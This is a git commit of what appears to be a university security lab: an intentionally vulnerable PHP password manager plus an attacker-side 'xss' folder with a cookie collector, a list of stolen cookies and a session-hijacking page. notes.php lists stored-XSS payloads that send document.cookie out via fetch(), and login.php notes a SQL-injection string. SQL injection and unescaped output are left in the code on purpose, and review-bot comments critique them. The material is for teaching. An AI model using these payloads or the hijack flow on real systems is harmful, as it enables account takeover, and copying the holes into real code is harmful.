Init commit with passman (and XSS) files aranged as a deployed environment

This commit is contained in:
Christos Choutouridis 2026-01-10 17:56:35 +02:00
commit 61c777f33a
14 changed files with 828 additions and 0 deletions

.gitignore vendored Normal file

@ -0,0 +1,3 @@
# Generic files
*.zip


@ -0,0 +1,65 @@
-- --------------------------------------------------------
-- Host: 127.0.0.1
-- Server version: 10.4.22-MariaDB - mariadb.org binary distribution
-- Server OS: Win64
-- HeidiSQL Version: 12.7.0.6850
-- --------------------------------------------------------
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET NAMES utf8 */;
/*!50503 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
CREATE DATABASE IF NOT EXISTS `pwd_mgr` /*!40100 DEFAULT CHARACTER SET latin1 */;
USE `pwd_mgr`;
CREATE TABLE IF NOT EXISTS `dummy` (
`id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
CREATE TABLE IF NOT EXISTS `login_users` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`username` varchar(20) NOT NULL,
`password` varchar(256) NOT NULL DEFAULT '',
PRIMARY KEY (`id`),
UNIQUE KEY `user` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1;
INSERT INTO `login_users` (`id`, `username`, `password`) VALUES
(1, 'u1', 'p1');
CREATE TABLE IF NOT EXISTS `notes` (
`notesid` int(11) NOT NULL AUTO_INCREMENT,
`login_user_id` int(11) DEFAULT NULL,
`note` varchar(300) NOT NULL,
PRIMARY KEY (`notesid`) USING BTREE,
KEY `FK_notes-login_users` (`login_user_id`) USING BTREE,
CONSTRAINT `FK_notes-login_users` FOREIGN KEY (`login_user_id`) REFERENCES `login_users` (`id`) ON DELETE CASCADE ON UPDATE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=28 DEFAULT CHARSET=latin1;
INSERT INTO `notes` (`notesid`, `login_user_id`, `note`) VALUES
(1, 1, 'test1');
CREATE TABLE IF NOT EXISTS `websites` (
`webid` int(11) NOT NULL AUTO_INCREMENT,
`login_user_id` int(11) DEFAULT NULL,
`web_url` varchar(250) NOT NULL,
`web_username` varchar(20) NOT NULL DEFAULT '',
`web_password` varchar(300) NOT NULL DEFAULT '',
PRIMARY KEY (`webid`) USING BTREE,
KEY `FK_websites-login_users` (`login_user_id`),
CONSTRAINT `FK_websites-login_users` FOREIGN KEY (`login_user_id`) REFERENCES `login_users` (`id`) ON DELETE CASCADE ON UPDATE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=latin1;
INSERT INTO `websites` (`webid`, `login_user_id`, `web_url`, `web_username`, `web_password`) VALUES
(1, 1, 'www.test.com', 'tom', 'tompass');
/*!40103 SET TIME_ZONE=IFNULL(@OLD_TIME_ZONE, 'system') */;
/*!40101 SET SQL_MODE=IFNULL(@OLD_SQL_MODE, '') */;
/*!40014 SET FOREIGN_KEY_CHECKS=IFNULL(@OLD_FOREIGN_KEY_CHECKS, 1) */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40111 SET SQL_NOTES=IFNULL(@OLD_SQL_NOTES, 1) */;
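Review bot: Every table is created with `DEFAULT CHARSET=latin1` (L33, L37, L44, L54, L66) while the dump itself runs `SET NAMES utf8mb4` (L27) and the pages that write to these tables declare `<meta charset="UTF-8">`, so text in `note`, `web_url` or `web_password` outside the latin1 range will be converted or rejected on insert; `utf8mb4` on the database and tables would match the client encoding. The seed rows at L45–L46 and L67–L68 store credentials as plaintext; `password` is already `varchar(256)`, which is wide enough for `password_hash()` output if the application moves to hashed storage. The `dummy` table at L35–L37 is not referenced by any file in this commit and looks like a leftover.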


@ -0,0 +1,126 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Dashboard</title>
<style>
table {
border-collapse: collapse;
width: 30%;
border: 1px solid black;
}
td, tr {
width: 50%;
padding: 8px;
text-align: left;
}
</style>
</head>
<?php
// Resume existing session (or start a new one)
session_start();
// If not logged in redirect to login page
if (!isset($_SESSION['loggedin']) || $_SESSION['loggedin'] !== true || $_SESSION['username'] == '') {
header("Location: login.php");
exit;
}
$username = $_SESSION['username'];
// Connect to the database
$conn=mysqli_connect("localhost","root","","pwd_mgr");
// Check connection
if (mysqli_connect_errno()) {
echo "Failed to connect to MySQL: " . mysqli_connect_error();
exit();
}
// Check if 'Insert-new-website' button is selected
if(isset($_POST['new_website'], $_POST['new_username'], $_POST['new_password']) &&
trim($_POST['new_website']) !='' && trim($_POST['new_username']) != '' && trim($_POST['new_password']) != '') {
$new_website = trim($_POST["new_website"]);
$new_username = trim($_POST["new_username"]);
$new_password = trim($_POST["new_password"]);
// Insert new web site
$sql_query = "INSERT INTO websites (login_user_id,web_url,web_username,web_password) VALUES " .
"((SELECT id FROM login_users WHERE username='{$username}'),'{$new_website}','{$new_username}','{$new_password}');";
//echo $sql_query;
$result = $conn->query($sql_query);
$conn -> close();
// After processing, redirect to the same page to clear the form
unset($_POST['new_website']);
unset($_POST['new_username']);
unset($_POST['new_password']);
header("Location: " . $_SERVER['PHP_SELF']);
exit();
}
// Check if 'Delete-website' button was selected
if(isset($_POST['delete_website']) && trim($_POST["websiteid"] != '')) {
$webid = trim($_POST["websiteid"]);
// Delete selected web site
$sql_query = "DELETE FROM websites WHERE webid='{$webid}';";
//echo $sql_query;
$result = $conn->query($sql_query);
$conn -> close();
// After processing, redirect to the same page to clear the form
unset($_POST['websiteid']);
header("Location: " . $_SERVER['PHP_SELF']);
exit();
}
// Display list of user's web sites
$sql_query = "SELECT * FROM websites INNER JOIN login_users ON websites.login_user_id=login_users.id WHERE login_users.username='{$username}';";
//echo $sql_query;
$result = $conn->query($sql_query);
//echo htmlspecialchars($username);
echo "<h3>Entries of " . $username . "</h3>";
if (!empty($result) && $result->num_rows >= 1) {
while ($row = $result -> fetch_assoc()) {
echo "<table border=0>";
echo "<tr style='background-color: #f4f4f4;'><td colspan=2>" . $row["web_url"] . "</td></tr>" .
"<tr><td>Username: " . $row["web_username"] . "</td><td>Password: " . $row["web_password"] . "</td></tr>";
echo "<tr><td><form method='POST' style='height: 3px'>" .
"<input type='hidden' name='websiteid' value='" . $row["webid"] . "'>" .
"<button type='submit' name='delete_website'>Delete</button></form></td></tr>";
echo "<tr><td colspan=2 style=height: 20px;></td></tr>";
echo "</table><p/>";
}
// Free result set
$result -> free_result();
} else {
echo "<p><font color=red>No entries found.</font></p>";
}
$conn -> close();
?>
<body>
<p/>
<form method="POST" action="dashboard.php">
<input type="text" name="new_website" placeholder="website"><br />
<input type="text" name="new_username" placeholder="Username"><br />
<input type="password" name="new_password" placeholder="Password"><br />
<button type="submit">Insert new website</button>
</form>
<p/>
<a href="notes.php">Notes - announcements</a>
<p/>
<a href="logout.php">Logout</a>
<p/>
<a href="index.html">Home page</a>
</body>
</html>
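Review bot: The delete branch at L133–L136 removes a row by `webid` alone, so any logged-in user can delete another user's entry by posting a different id; the DELETE should also be scoped to the session owner, e.g. `DELETE FROM websites WHERE webid=? AND login_user_id=(SELECT id FROM login_users WHERE username=?)` run through `$conn->prepare()` with `$webid` and `$username` bound. L133 also applies `trim()` to the boolean result of `$_POST["websiteid"] != ''` (the comparison binds before the call), so the intended form is `trim($_POST['websiteid'] ?? '') !== ''`. The INSERT at L120–L121 and the SELECT at L146 interpolate `$username` and POST fields into SQL, and L154–L158 echo `web_url`, `web_username`, `web_password` and `webid` without `htmlspecialchars()`; if that is intentional for the lab, a one-line comment at each site saying so would stop it being "fixed" later, otherwise bind parameters and escape output. Note that L78–L96 are emitted before `session_start()` and the `header("Location: …")` calls at L102, L129 and L142, which presumably relies on output buffering being enabled in php.ini.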


@ -0,0 +1,59 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Password Manager</title>
</head>
<body>
<h3>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Password Manager - AUTH-ECE - 2025-2026</h3>
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;List of Password Manager pages:
<br />
<ul>
<li>
<a href="http://localhost/passman/register.php">Registration Form</a>
</li>
<br />
<li>
<a href="http://localhost/passman/login.php">Login Page</a>
</li>
<br />
<li>
<a href="http://localhost/passman/logout.php">Logout Page</a>
</li>
<br />
<li>
<a href="http://localhost/passman/dashboard.php">Dashboard</a> (display passwords for websites)
</li>
<br />
<li>
<a href="http://localhost/passman/notes.php">Notes</a> (notes/comments/announcements)
</li>
<br />
</ul>
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Testing useful functions:
<br />
<ul>
<li>
Test <a href="http://localhost/passman/test_hash.php">hashing</a> functions in PHP (server side)
</li>
<br />
<li>
Test <a href="http://localhost/passman/test_encrypt.php">encrypting/decrypting</a> functions in PHP (server side)
</li>
<br />
</ul>
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Hacker's side (for using stealing cookies using XSS):
<a href="http://localhost/passman/xss">http://localhost/passman/xss</a>
<br />
</body>
</html>
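Review bot: The links at L228 and L232 point to `test_hash.php` and `test_encrypt.php`, which are not among the files added in this commit, so they will 404 on the deployed tree until those pages are committed. All links use absolute `http://localhost/passman/…` URLs (L203–L238) while the other pages link relatively (`login.php`, `dashboard.php`), so this page breaks as soon as the app is served from another host or path; relative hrefs would match. The caption at L237 reads "for using stealing cookies using XSS" — probably "for stealing cookies using XSS".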


@ -0,0 +1,89 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login Form</title>
</head>
<?php
// Start a new session (or resume an existing one)
session_start();
// Check if the user is already logged in
if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true && $_SESSION['username'] !== '') {
// Redirect to the dashboard page
header("Location: dashboard.php");
exit;
}
if ($_SERVER["REQUEST_METHOD"] === "POST") {
if(!isset($_POST['username'], $_POST['password']) || trim($_POST['username']) =='' || trim($_POST['password']) == '') {
$login_message = "Missing username or password.";
}
else {
// Get user submitted information
$username = trim($_POST['username']);
$password = trim($_POST['password']);
// Connect to the database
$conn=mysqli_connect("localhost","root","","pwd_mgr");
// Check connection
if (mysqli_connect_errno()) {
echo "Failed to connect to MySQL: " . mysqli_connect_error();
exit();
}
// xxx' OR 1=1; -- '
$sql_query = "SELECT * FROM login_users WHERE username='{$username}' AND password='{$password}';";
//echo $sql_query;
// Check if the credentials are valid
$result = $conn->query($sql_query);
unset($_POST['username']);
unset($_POST['password']);
if (!empty($result) && $result->num_rows >= 1) {
// Regenerate session ID to prevent session fixation!
//session_regenerate_id(true);
// Successfully logged in
$_SESSION['username'] = $username;
$_SESSION['loggedin'] = true;
//while ($row = $result -> fetch_assoc()) {
// print_r($row);
// $_SESSION['user_id'] = $row['id'];
//}
// Free result set
$result -> free_result();
$conn -> close();
// Redirect to a dashboard page
header("Location: dashboard.php");
exit;
} else {
$login_message = "Invalid username or password";
}
$conn -> close();
}
}
?>
<body>
<h3>Password Manager</h3>
<form method="POST" action="">
<input type="text" name="username" placeholder="Username" required><br />
<input type="password" name="password" placeholder="Password"><br />
<button type="submit">Login</button>
</form>
<br />
<?php if (!empty($login_message)) { echo "<font color=red>$login_message</font>"; } ?>
<p/>
<a href="register.php">Register new user</a>
<p/>
<a href="index.html">Home page</a>
</body>
</html>
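Review bot: The credential check at L278 compares the submitted password against the stored column in plaintext, so the secret is only as protected as the database row; the password should be stored with `password_hash()` at registration and checked here by fetching the row for the username alone and calling `password_verify($password, $row['password'])`. The same statement builds SQL by interpolating `$username` and `$password` (the comment at L277 already documents the consequence); `$conn->prepare('SELECT id, password FROM login_users WHERE username=?')` with `bind_param('s', $username)` removes that path. `session_regenerate_id(true)` at L286 is commented out although the comment at L285 explains why it is needed — it should run right before `$_SESSION['loggedin'] = true` at L289. As in the dashboard hunk, the HTML at L246–L252 is output before the `header("Location: …")` calls at L259 and L298, which depends on output buffering being on.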


@ -0,0 +1,24 @@
<?php
// Resume existing session (or start a new one)
session_start();
// Destroy the session in case of using session-based authentication
session_unset(); // Unset all session variables
session_destroy(); // Destroy the session
//redirect to the login page
echo '<script>window.location.href = "login.php";</script>';
exit();
/*
if (session_status() !== PHP_SESSION_ACTIVE) :void
{
session_start();
session_unset();
session_destroy();
session_write_close();
setcookie(session_name(), '', 0, '/');
session_regenerate_id(true);
}
*/
?>
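Review bot: `session_unset()`/`session_destroy()` at L330–L331 clear the server-side data but leave the session cookie on the client, so the browser keeps presenting the old `PHPSESSID`; the commented block at L342 already shows the intended `setcookie(session_name(), …)` call, which should run after `session_destroy()` with an expiry in the past (e.g. `time() - 3600`) so the cookie is actually removed. The redirect at L333 is done through an inline `<script>`, which fails for clients without JavaScript; since nothing has been echoed before it, `header('Location: login.php'); exit;` works here. If the commented block at L335–L345 is meant to be revived, note that `:void` on the `if` at L336 is not valid PHP.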


@ -0,0 +1,173 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Notes - Comments</title>
<style>
form {
max-width: 500px;
margin: 20px 0;
padding: 20px;
border: 1px solid #ccc;
background-color: #f9f9f9;
text-align: left;
}
label {
font-size: 1.1em;
margin-bottom: 10px;
display: inline-block;
}
textarea {
width: 100%;
height: 150px;
padding: 10px;
font-size: 1em;
border: 1px solid #ccc;
resize: vertical;
text-align: left;
}
button {
padding: 10px 20px;
font-size: 1em;
background-color: #4CAF50;
color: white;
border: none;
cursor: pointer;
}
button:hover {
background-color: #45a049;
}
body {
font-family: Arial, sans-serif;
background-color: #f4f4f9;
margin: 0;
padding: 20px;
}
.note {
width: 510px;
background-color: #f9f9f9;
border: 1px solid #ddd;
padding: 15px;
margin-bottom: 15px;
border-radius: 5px;
box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
}
.note-content {
font-size: 1.2em;
color: #333;
}
.note-signature {
text-align: right;
font-size: 0.9em;
color: #666;
margin-top: 10px;
font-style: italic;
}
</style>
</head>
<?php
// Resume existing session (or start a new one)
session_start();
// If not logged in redirect to login page
if (!isset($_SESSION['loggedin']) || $_SESSION['loggedin'] !== true || $_SESSION['username'] == '') {
header("Location: login.php");
exit;
}
$username = $_SESSION['username'];
// Connect to the database
$conn=mysqli_connect("localhost","root","","pwd_mgr");
// Check connection
if (mysqli_connect_errno()) {
echo "Failed to connect to MySQL: " . mysqli_connect_error();
exit();
}
// Check if new note is entered and add it
if(isset($_POST['new_note']) && trim($_POST['new_note']) !='') {
$new_note = trim($_POST["new_note"]);
/*
XSS using alert(2)<script>alert(2);</script>
XSS using string.fromCharCode with ASCII codes<script>alert(String.fromCharCode(88,83,83,32,117,115,105,110,103,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101));</script>
XSS eval of Hex Unicode Escape Sequences<script>eval("\u0061\u006c\u0065\u0072\u0074(\u0022\u0058\u0053\u0053\u0020\u0075\u0073\u0069\u006e\u0067\u0020\u0065\u0076\u0061\u006c\u0022)");</script>
XSS console cookie<script>console.log(document.cookie);alert(document.cookie);</script>
XSS steal cookie with fetch
<script>
fetch(`http://localhost/passman/xss/getcookie.php?v=`+document.cookie)
.then(response => response.text())
.then(data => {
console.log(data);
})
.catch(error => {
console.error(`Error fetching data:`, error);
});
</script>
XSS steal cookie with simpler fetch<script>fetch(`http://localhost/passman/xss/getcookie.php?v=`+document.cookie)</script>
or<script>fetch(`http://localhost/passman/xss/getcookie.php?v=${document.cookie}`)</script>
// HAS PROBLEM: XSS steal cookie with href redirection<script>window.location.href=`http://localhost/passman/xss/getcookie.php?v=`+document.cookie;</script>
// HAS PROBLEM: XSS steal cookie with img on-error<img src=x onerror=this.src=`http://localhost/passman/xss/getcookie.php?v=`+document.cookie;>
*/
// Insert new note
//$sql_query = "INSERT INTO notes (login_user_id,note) VALUES " .
// "((SELECT id FROM login_users WHERE username='{$username}'),('{$new_note}'));";
$sql_query = "INSERT INTO notes (login_user_id, note) ".
"VALUES ((SELECT id FROM login_users WHERE username='{$username}'), '{$new_note}')";
//echo $sql_query;
$result = $conn->query($sql_query);
$conn -> close();
// After processing, redirect to the same page to clear the form
unset($_POST['new_note']);
header("Location: " . $_SERVER['PHP_SELF']);
exit();
}
// Display list of all notes/comments
$sql_query = "SELECT notes.note, login_users.username FROM notes INNER JOIN login_users ON notes.login_user_id=login_users.id;";
//echo $sql_query;
$result = $conn->query($sql_query);
echo "<h3>List of notes/comments</h3>";
if (!empty($result) && $result->num_rows >= 1) {
while ($row = $result -> fetch_assoc()) {
echo "<div class='note'>";
echo "<div class='note-content'>" . $row["note"] . "</div>";
echo "<div class='note-signature'> by " . $row["username"] . "</div>";
echo "</div>";
}
// Free result set
$result -> free_result();
} else {
echo "<p><font color=red>No entries found.</font></p>";
}
$conn -> close();
?>
<body>
<p/>
<form method="POST">
<label for="note">Enter your note:</label><br>
<textarea id="note" name="new_note" placeholder="Write your note here..." required></textarea><br><br>
<button type="submit">Submit Note</button>
</form>
<a href="dashboard.php">Dashboard</a>
<p/>
<a href="logout.php">Logout</a>
</body>
</html>
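Review bot: L480–L481 echo `note` and `username` straight from the database, which is the stored-XSS sink the payload catalogue in the comment at L438–L458 targets; if the sink is deliberate for the lab, say so in a comment next to the echo (`// intentionally unescaped: stored XSS demo`), otherwise wrap both in `htmlspecialchars($row['note'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')`. The redirect at L469 (and L129/L142 in the dashboard hunk) builds the `Location` header from `$_SERVER['PHP_SELF']`, which reflects any path-info appended to the request URL; a fixed `header('Location: notes.php')` is safer. The INSERT at L462–L463 interpolates `$username` and `$new_note` and its `$result` is never checked, so a failed insert silently redirects as if it had succeeded.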


@ -0,0 +1,83 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Registration Form</title>
</head>
<body>
<h3>New user registration</h3>
<?php
// Start a new session (or resume an existing one)
session_start();
// Check if the user is already logged in
if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true && $_SESSION['username'] !== '') {
echo "<font color=red>You are already logged in!</font></br>";
echo "Please <a href='logout.php'>logout</a> first";
exit;
}
if ($_SERVER["REQUEST_METHOD"] === "POST") {
if(!isset($_POST['new_username'], $_POST['new_password']) || trim($_POST['new_username']) =='' || trim($_POST['new_password']) == '') {
$login_message = "Missing username or password.";
}
else {
// Get user submitted information
$new_username = trim($_POST['new_username']);
$new_password = trim($_POST['new_password']);
mysqli_report(MYSQLI_REPORT_OFF); // disable exceptions
// Connect to the database
$conn=mysqli_connect("localhost","root","","pwd_mgr");
// Check connection
if (mysqli_connect_errno()) {
echo "Failed to connect to MySQL: " . mysqli_connect_error();
exit();
}
// Insert a new user
$sql_query = "INSERT INTO login_users (username,password) VALUES ('{$new_username}','{$new_password}');";
//echo $sql_query;
$result = $conn->query($sql_query);
unset($_POST['new_username']);
unset($_POST['new_password']);
if ($result == true) {
echo "<font color=red>Successful registration!</font>";
echo "<p />You can now use the <a href='login.php'>login</a> page";
exit;
}
else
$login_message = "Error, probably user already exists!";
// Free result set
$conn -> close();
}
}
?>
<body>
<p/>
<form method="POST" action="register.php">
<input type="text" name="new_username" placeholder="Username"><br />
<input type="password" name="new_password" placeholder="Password"><br />
<button type="submit">Register</button>
</form>
<br />
<?php
if (!empty($login_message)) {
echo "<font color=red>$login_message</font>";
echo "<p />Go to the <a href='login.php'>login</a> page";
}
?>
</body>
</html>
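Review bot: L542 stores the submitted password verbatim; it should be `password_hash($new_password, PASSWORD_DEFAULT)` bound through a prepared statement (`INSERT INTO login_users (username, password) VALUES (?, ?)`), which also covers the interpolation of `$new_username`. L547 uses `$result == true`; `mysqli::query()` returns `bool` for an INSERT so `$result === true` is the precise check, and the comment at L554 ("Free result set") does not describe the `$conn->close()` below it. L533 turns mysqli error reporting off, so the duplicate-username case at L553 is guessed from a `false` return; checking `$conn->errno === 1062` would tell a duplicate apart from any other failure. The document opens `<body>` twice (L514 and L559), and the `exit` at L550 ends the response before `</body></html>`.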


@ -0,0 +1,47 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Get a cookie</title>
</head>
<body>
<h3>Get a cookie</h3>
<?php
// Check if 'value' parameter is passed via GET
// http://localhost/passman/xss/getcookie.php?v=PHPSESSID=o1mg400lipd2mck69kpfnl6p5s
if (isset($_GET['v'])) {
$stolen_cookie = $_GET['v']; // Retrieve the value from the GET parameter
// Define the file path where the value will be stored
$file = 'stolencookies.txt';
// Append the value to the file (or create it if it doesn't exist)
file_put_contents($file, $stolen_cookie . PHP_EOL, FILE_APPEND);
echo "Value has been saved successfully!";
} else {
echo "No value received via GET query string.";
}
// Set cookie manually for debugging:
//$stolen_cookie = "PHPSESSID=o1mg400lipd2mck69kpfnl6p5s";
?>
<!--
<script>
let expires = new Date();
//expires.setTime(expires.getTime()); // cookie expires now
//expires.setTime(expires.getTime() + (30 * 24 * 60 * 60 * 1000)); // 30 days from now
expires.setTime(expires.getTime() + (120 * 1000)); // 2 mins from now
document.cookie = <?php echo '"' . $stolen_cookie . '"' ?> + "; path=/; expires=" + expires.toUTCString() + "; Secure; SameSite=Strict";
// Check if cookies are set using console.log
console.log(document.cookie);
</script>
-->
</body>
</html>
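Review bot: The `<?php echo '"' . $stolen_cookie . '"' ?>` at L610 still executes even though it sits inside an HTML comment (`<!-- … -->` only hides the output from the browser), so a request without `v` raises an undefined-variable warning for `$stolen_cookie`, and a stored value containing `-->` or `</script>` ends the comment early. Either move the whole block at L604–L614 into a PHP `/* … */` comment or delete it.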


@ -0,0 +1,36 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>XSS for Password Manager</title>
</head>
<body>
<h3>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;XSS for Password Manager</h3>
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;List of pages:
<br />
<ul>
<li>
Get a cookie: <a href="http://localhost/passman/xss/getcookie.php">getcookie.php</a>
<br /><i>used by XSS javascripts as: http://localhost/passman/xss/getcookie.php?v=PHPSESSID=o1mg400lipd2mck69kpfnl6p5s</i>
</li>
<br />
<li>
File of stolen cookies: <a href="stolencookies.txt">stolencookies.txt</a>
</li>
<br />
<li>
List all cookies: <a href="http://localhost/passman/xss/listcookies.php">listcookies.php</a>
</li>
<br />
<li>
Use of a cookie: <a href="http://localhost/passman/xss/usecookie.php">usecookie.php</a>
<br /><i>used by listcookies.php as http://localhost/passman/xss/usecookie.php?v=3h9ug308730bfugjjse0dbmcjr</i>
</li>
</ul>
</body>
</html>


@ -0,0 +1,62 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>List stolen cookies</title>
</head>
<body>
<h3>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;List of 'stolen' cookies</h3>
<?php
// Define the path to the cookie file
$cookie_file = 'stolencookies.txt'; // Change this to the path of your cookie file
// Check if the file exists
if (file_exists($cookie_file)) {
// Read the contents of the cookie file
$cookie_data = file($cookie_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
/*
$expires = new DateTime('now', new DateTimeZone('UTC')); // Current UTC date and time
$expires->modify('+2 minutes'); // Add 2 minutes
$expiration = $expires->format('D, d M Y H:i:s') . ' GMT';
*/
// Process each line
echo "<ol>";
$cookie_name = "PHPSESSID=";
foreach ($cookie_data as $line) {
// Split the cookies in each line by semicolon
$cookies = explode(';', $line);
// List each cookie separately
foreach ($cookies as $cookie) {
$cookie = trim($cookie);
// Check for PHPSESSID=... cookie
if (strpos($cookie, $cookie_name) === 0) {
// Get PHPSESSID cookie value
$cookie = str_replace("PHPSESSID=", "", trim($cookie));
echo "<li>";
echo "<a href='http://localhost/passman/xss/usecookie.php?v=" . $cookie . "'>";
echo "PHPSESSID=" . htmlspecialchars($cookie) . "</a>";
echo "</li>";
} else {
// Cookie does not contain PHPSESSID value
echo "<li>";
echo " Skipping cookie: " . htmlspecialchars($cookie);
echo "</li>";
}
}
}
echo "</ol>";
} else {
// Error message if file does not exist
echo "<p>Cookie file not found.</p>";
}
?>
</body>
</html>
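Review bot: L693 inserts `$cookie` into the `href` attribute unescaped while L694 escapes the same value for the text node, so a line in the file containing a quote or `>` breaks out of the attribute; use `htmlspecialchars($cookie, ENT_QUOTES)` in the attribute and `urlencode($cookie)` for the query value. `file()` at L673 returns `false` on a read error and the `foreach` at L682 would then emit a warning; checking `$cookie_data === false` alongside `file_exists()` covers it. `strpos($cookie, $cookie_name) === 0` at L689 is `str_starts_with($cookie, $cookie_name)` on PHP 8, and the second `trim()` at L691 is redundant after L687.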


@ -0,0 +1,2 @@
PHPSESSID=knjfug3u4gavdas9o4eupe38l1; seclab_user=u1
seclab_user=u1; PHPSESSID=o1mg400lipd2mck69kpfnl6p5s
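Review bot: This file is the runtime output of the cookie collector, yet it is committed with two captured `PHPSESSID` values (L716–L717); the `.gitignore` added in the same commit only excludes `*.zip`, so every lab run will leave live session ids in the working tree and in future commits. Adding this file's path to `.gitignore` and shipping an empty or clearly marked sample instead keeps real session material out of history.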


@ -0,0 +1,59 @@
<?php
// Check if 'value' parameter is passed via GET
// http://localhost/passman/xss/setcookie.php?v=PHPSESSID
if (isset($_GET['v'])) {
$stolen_cookie = $_GET['v']; // Retrieve the value from the GET parameter
// Set the session cookie manually
//setcookie("PHPSESSID", $stolen_cookie, time() + 3600, "/");
setcookie("PHPSESSID", $stolen_cookie, 0, "/");
// Set the session ID
session_id($stolen_cookie);
// Now resume the session
session_start();
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Test of using a stolen cookie</title>
</head>
<body>
<h3>Test of using a stolen cookie</h3>
Bypassing authentication and impersonating another user by using a stolen cookie<br/>
<?php
// Now use the session
echo "Session ID is set to: <b>PHPSESSID=" . session_id() . "</b><br>";
/*
if (isset($_SESSION['loggedin']) && $_SESSION['username'] !== '') {
echo "Username: " . $_SESSION['username'] . "<br>";
echo "Logged in: " . $_SESSION['loggedin'] . "<br>";
}
else {
echo "session variables expired";
}
*/
// If session parameter is not set, set it to: 'undefined ...'
$username = $_SESSION['username'] ?? 'undefined (session variable expired)';
$loggedin = $_SESSION['loggedin'] ?? 'undefined (session variable expired)';
echo "<b>Username:</b> " . $username . "<br>";
echo "<b>Logged in flag:</b> " . $loggedin . "<br>";
?>
<br />
If all above session parameters are defined, try accessing the
<a href="../dashboard.php">dashboard</a>
<br /><br />
<a href="listcookies.php">List cookies</a>
</body>
</html>
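Review bot: L731 passes `$_GET['v']` to `session_id()` without validation; PHP only accepts ids made of the characters permitted by `session.sid_bits_per_character` and either warns or silently replaces anything else, so a guard such as `preg_match('/^[A-Za-z0-9,-]{22,256}$/', $stolen_cookie)` before L729 would give a clear error instead of a confusing empty session. L761–L762 echo `$_SESSION['username']` and `$loggedin` without `htmlspecialchars()`; the username originates from the registration form, so this page is a second sink for any markup stored there. `setcookie()` at L729 looks redundant, since `session_start()` at L733 sends the `PHPSESSID` cookie itself once the id has been set with `session_id()` — worth confirming on the target PHP version.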
